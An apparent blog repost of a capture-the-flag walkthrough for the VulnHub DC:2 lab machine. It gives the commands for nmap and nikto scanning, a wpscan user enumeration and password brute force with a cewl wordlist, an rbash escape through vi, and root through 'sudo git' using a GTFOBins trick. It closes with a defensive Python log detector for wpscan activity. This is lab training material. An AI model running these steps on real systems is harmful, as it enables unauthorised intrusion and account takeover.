
vulnhub DC: 2

2022-06-24 22:59:00 Fairy elephant

Attack path:

nmap scan ---- nikto scan ---- wpscan enumerates WordPress users ---- cewl crawls the site for words ---- wpscan brute-forces the WordPress password ---- ssh login as tom and rbash bypass with vi ---- su to jerry ---- privilege escalation via sudo git

Environment:

Target machine: 192.168.101.75

Attacker machine: 192.168.101.34

Steps:

1. nmap scan

sudo nmap -sV -sC -p- 192.168.101.75

The scan finds port 80 (http) and port 7744 (ssh) open.

2. nikto scan of the website, edit the hosts file

nikto -host http://192.168.101.75

The nikto scan shows that the site root redirects to http://dc-2/. Together with the hint in the page title from the nmap output, "http-title: Did not follow redirect to http://dc-2/", this means the attacker machine's hosts file must first map the target IP to the name dc-2.

Since the attacker machine is Kali, the file to edit is /etc/hosts:

sudo vim /etc/hosts

Add the highlighted line (192.168.101.75 dc-2), then save and exit.

Then open http://dc-2/ in the browser. The Flag page contains flag1, which says to log into the site to find the next flag; the usual password dictionaries do not work, so a password list has to be generated with cewl.

3. wpscan enumerates the site's users

To log into the site you first need to know which users exist. Because the target runs WordPress, wpscan can enumerate them:

wpscan --url http://dc-2/ -e

Three users are found: admin, jerry, tom

Save these three usernames in a file user.txt, one per line, for later use.

4. cewl crawls for words, wpscan brute-forces the password

Use cewl to crawl the words contained in the site and save them to the file dc2.txt:

cewl http://dc-2/ -w dc2.txt

Then use wpscan to brute-force usernames and passwords, with user.txt from the previous step as the username list and dc2.txt as the password list:

wpscan --url http://dc-2/ -U user.txt -P dc2.txt

Two results come back:

| Username: jerry, Password: adipiscing

| Username: tom, Password: parturient

5. Log into WordPress as jerry and find flag2

Open http://dc-2/wp-admin/ in the browser to reach the login page and log in with username jerry and password adipiscing.

Under Pages there is a page named Flag2.

It holds the second flag, which hints at trying another entry point.

6. ssh login as tom, rbash bypass with vi

Only tom can log in over ssh; jerry cannot.

ssh tom@192.168.101.75 -p 7744

The password is parturient, recovered by the brute force in step 4.

After logging in it turns out that tom's login shell is rbash, so many commands are not available.

Bypass rbash with vi:

In the target's shell, run vi

Then, inside vi, enter

:set shell=/bin/bash
:shell

Press Enter and rbash is bypassed; you get bash.

On this target, however, many commands still cannot be executed, because the environment variable PATH is set to /home/tom/usr/bin and that directory holds only a few commands.

So the value of PATH needs to be changed:

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Now flag3.txt can be read with cat; flag3 hints at switching to the jerry user with su.

7. Privilege escalation via sudo git

Switch to jerry by entering

su - jerry

and then enter jerry's password adipiscing, obtained with wpscan in step 4.

flag4.txt is found under /home/jerry.

sudo -l

This shows that jerry can run the git command as root, and git can be used for privilege escalation through sudo.

Reference: git | GTFOBins

First, on the target's command line enter

sudo git -p help config

Then, in the help screen that opens, type

!/bin/bash

This gives a root shell.

final-flag.txt is in the /root directory.
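From the defender's side, the user enumeration and password attack of steps 3 and 4 leave a recognisable trace in the web server's access log. The following Python script is an added example, not part of the original write-up: it parses constructed Apache combined-format log lines (the IPs, timestamps and the "WPScan v3.8" user agent string are made up for the demonstration) and flags a source that enumerates authors or repeatedly fails wp-login.php within a short window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format: ip ident user [ts] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Constructed sample log (not from the original page): author-ID and REST user enumeration, then twelve
# wp-login.php POSTs in one minute from the scanner host, and one normal successful login from another
# host. IPs, timestamps and the "WPScan v3.8" user agent are made up for the demonstration.
SCANNER = '192.168.101.34 - - [24/Jun/2022:22:{}:{:02d} +0800] "{} HTTP/1.1" {} {} "-" "WPScan v3.8"'
SAMPLE_LOG = "\n".join(
    [SCANNER.format(10, 1, "GET /?author=1", 301, 0), SCANNER.format(10, 2, "GET /wp-json/wp/v2/users", 200, 512)]
    + [SCANNER.format(11, i, "POST /wp-login.php", 200, 3544) for i in range(12)]
    + ['192.168.101.50 - - [24/Jun/2022:22:11:30 +0800] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"'])

def parse(line):
    """Parse one combined-format line into a dict (ip, ts, method, path, status, ua), or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    e["status"] = int(e["status"])
    return e

def detect(lines, window=timedelta(minutes=5), threshold=10):
    """Return {ip: sorted reasons} for sources whose requests look like a wpscan run."""
    findings = defaultdict(set)
    failed = defaultdict(list)  # ip -> timestamps of failed wp-login.php POSTs inside the window
    for line in lines:
        e = parse(line)
        if e is None:
            continue
        ip, path = e["ip"], e["path"]
        if "wpscan" in e["ua"].lower():
            findings[ip].add("wpscan user-agent")
        if e["method"] == "GET" and (path.startswith("/?author=") or path.startswith("/wp-json/wp/v2/users")):
            findings[ip].add("user enumeration")
        # WordPress re-renders the login form with 200 on failure and redirects (302) on success,
        # so a burst of 200s on POST /wp-login.php from one source is a password attack.
        if e["method"] == "POST" and path.startswith("/wp-login.php") and e["status"] == 200:
            ts = failed[ip]
            ts.append(e["ts"])
            while ts and e["ts"] - ts[0] > window:
                ts.pop(0)
            if len(ts) >= threshold:
                findings[ip].add("wp-login brute force")
    return {ip: sorted(r) for ip, r in findings.items()}
```

A scanner that changes its user agent still trips the enumeration and brute-force rules, which is why the script does not rely on the UA string alone.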


Copyright notice
This article was written by [Fairy elephant]; please include the original link when reposting, thanks
https://yzsam.com/2022/175/202206241652368430.html